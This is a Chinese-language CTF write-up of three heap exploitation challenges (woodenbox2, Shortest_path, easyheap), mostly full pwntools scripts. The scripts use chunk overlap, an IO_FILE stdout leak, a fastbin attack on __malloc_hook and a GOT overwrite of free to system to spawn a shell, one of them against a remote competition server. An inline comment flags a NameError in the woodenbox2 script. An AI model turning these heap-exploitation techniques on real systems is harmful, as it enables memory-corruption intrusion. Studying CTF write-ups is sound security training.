高校戰疫網絡安全分享賽pwn覆盤

就做了一個pwn我tcl
但是收穫很多
總結一下，還是不夠細心；如果細心一點，估計還能做3、4個tttttcl

woodenbox2

這道題首先是用 chunk overlap，然後將 unsorted bin 切割到 fastbin（此時 unsorted bin 與 fastbin 指向了同一個堆塊），通過堆溢出將低位覆蓋爲 stdout 上方的位置，然後寫 IO_FILE 結構體 leak libc 基址，最後通過 fastbin attack 打 malloc_hook 即可。
IO_FILE 結構體的相關知識可以看一下：

https://wiki.x10sec.org/pwn/io_file/exploit-in-libc2.24/

exp:

from pwn import *
p=process('./woodenbox2')  # local run; the binary is expected in the current directory
elf=ELF('./woodenbox2')
libc=elf.libc  # libc picked up from the binary's loader: every symbol offset below depends on this exact build

def add(size,name):
	"""Menu option 1: create an entry of *size* bytes filled with *name*.

	Talks over the module-level ``p`` tube. The final write uses
	``sendafter`` (no newline appended) so *name* goes out byte-for-byte.
	"""
	steps = (('1', True), (str(size), True), (name, False))
	for data, newline in steps:
		if newline:
			p.sendlineafter(':', data)
		else:
			p.sendafter(':', data)

def edit(idx,size,content):
	"""Menu option 2: overwrite entry *idx* with *size* bytes of *content*.

	Uses the module-level ``p`` tube; *content* is sent raw (no newline).
	"""
	for line in ('2', str(idx), str(size)):
		p.sendlineafter(':', line)
	p.sendafter(':', content)

def delete(idx):
	"""Menu option 3: free entry *idx* via the module-level ``p`` tube."""
	for line in ('3', str(idx)):
		p.sendlineafter(':', line)


add(0x68,'0'*0x68)  # four 0x68-byte entries, indices 0..3
add(0x68,'1'*0x68)
add(0x68,'2'*0x68)
add(0x68,'3'*0x68)
edit(0,0x70,'0'*0x68+p64(0xe1))  # 0x70 bytes into a 0x68-byte entry: the trailing p64 lands on the next chunk's size field
delete(1)
delete(1)  # index 1 freed twice
add(0x38,'a'*0x38)
add(0x28,'b'*0x28)
payload='b'*0x28+p64(0x71)+'\xdd\x25'  # 2-byte partial overwrite; these low bytes are specific to the libc build/layout this run used
edit(2,len(payload),payload)
add(0x68,'\x00'*0x68)

add(0x68,'\x00'*0x33+p64(0xfbad3c80)+3*p64(0)+p8(0))  # presumably overwrites IO_FILE fields (see the linked notes) -- layout not verified here
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['_IO_2_1_stderr_']-192  # str + p64()/bytes concatenation: Python 2 only (TypeError on Python 3)
log.success('libcbase: '+hex(libcbase))
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]  # hard-coded one_gadget offsets for one particular libc; only o_g[0] is used below
one_gadget=libcbase+o_g[0]
malloc_hook=libcbase+libc.sym['__malloc_hook']
realloc=libcbase+libc.sym['__libc_realloc']
delete(3)
payload='a'*0x28+p64(0x71)+p64(malloc_hook-0x23)
edit(1,len(payload),payload)
add(0x68,'a'*0x68)
add(0x68,'a'*11+p64(one_gadget)+p64(realloc+15))
p.sendlineafter(':','1')
p.sendlineafter(':',str(size))  # BUG: 'size' is not defined at module scope (it is only a parameter of add/edit) -> NameError here, before p.interactive()
p.interactive()

Shortest_path

這題 flag 竟然讀入到了堆上面，直接填過去打印就行了
exp:

#!/usr/bin/python2
from pwn import *
p=process('./Shortest_path')  # local run; the binary is expected in the current directory

def add(idx,pri,size,name,num):
	"""Menu option 1: create entry *idx*.

	The remaining arguments are answered in the order the program prompts
	for them (pri, size, name, num), each terminated by a newline, over the
	module-level ``p`` tube. Note the prompt strings differ per field.
	"""
	prompts_and_values = (
		('> ', '1'),
		(': ', str(idx)),
		(': ', str(pri)),
		(': ', str(size)),
		(':', name),
		(': ', str(num)),
	)
	for prompt, value in prompts_and_values:
		p.sendlineafter(prompt, value)

add(0,2,0x68,'\x11'*0x38,0)  # three 0x68-byte entries, each name shorter than its size
add(1,2,0x68,'\x11'*0x38,0)
add(2,2,0x68,'\x11'*0x38,0)
add(3,2,0x48,'\x11'*0x30,0)  # a smaller 0x48-byte entry
p.sendlineafter('> ','4')  # menu option 4, then the two index answers it asks for
p.sendlineafter(': ',str(3))
p.sendlineafter(': ','3')
p.interactive()  # per the note above the script, the flag is expected in the printed output

easyheap

這題堆上的指針釋放後沒有清空，可以利用 fastbin 鏈表的性質二次利用，將 free 的 GOT 寫成 puts 即可泄露，然後將 free 寫成 system，釋放拿到 shell
exp:

#!/usr/bin/python2
from pwn import *
#p=process('./easyheap')
p=remote('121.36.209.145',9997)  # remote instance used for this run (the local process line above is commented out)
elf=ELF('./easyheap')
#libc=ELF('./libc.so.6')
libc=elf.libc  # local libc, not the remote one: symbol offsets below assume the two match

def add(size,content):
	"""Menu option 1: create an entry of *size* bytes holding *content*.

	Uses the module-level ``p`` tube; *content* is sent raw (no newline).
	"""
	p.sendlineafter(':', '1')
	p.sendlineafter('?', str(size))
	p.sendafter('?', content)

def timuchadd(size):
	"""Menu option 1 with only the size answered (no content is sent).

	Used with an oversized *size* so the program presumably refuses the
	allocation and never prompts for content -- not verified here.
	"""
	for prompt, value in ((':', '1'), ('?', str(size))):
		p.sendlineafter(prompt, value)

def edit(idx,content):
	"""Menu option 3: overwrite entry *idx* with *content* (sent raw)."""
	for prompt, value in ((':', '3'), ('?', str(idx))):
		p.sendlineafter(prompt, value)
	p.sendafter('?', content)

def delete(idx):
	"""Menu option 2: free entry *idx* via the module-level ``p`` tube."""
	for prompt, value in ((':', '2'), ('?', str(idx))):
		p.sendlineafter(prompt, value)

add(0x68,'\x11'*4)#0
add(0x180,'\x12'*4)#1
add(0x20,'/bin/sh\x00')  # index 2; this string is later handed to whatever free() resolves to
delete(0)
delete(1)
timuchadd(0x100000)  # oversized requests, no content sent (see timuchadd)
timuchadd(0x100000)
edit(0,p64(0)+p64(0x21)+p64(elf.got['free'])+p64(0x1000)+p64(0)+p64(0x71)+p64(0)*13+p64(0x21)+p64(0x6020C0))  # 0x6020C0 is an absolute address: assumes a non-PIE binary
edit(0,p64(elf.got['atoi']))
edit(1,p64(elf.plt['puts']))  # free's GOT slot now points at puts
delete(0)  # prints the atoi GOT entry
o_g=[0x45216,0x4526a,0xf02a4,0xf1147]  # hard-coded one_gadget offsets for one particular libc
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['atoi']  # str.ljust with a str pad: Python 2 only
one_gadget=libcbase+o_g[3]  # computed but never used below
system=libcbase+libc.sym['system']
edit(1,p64(system))  # free's GOT slot now points at system
log.success('libcbase: '+hex(libcbase))
delete(2)  # "free" of index 2 -> system('/bin/sh')
p.interactive()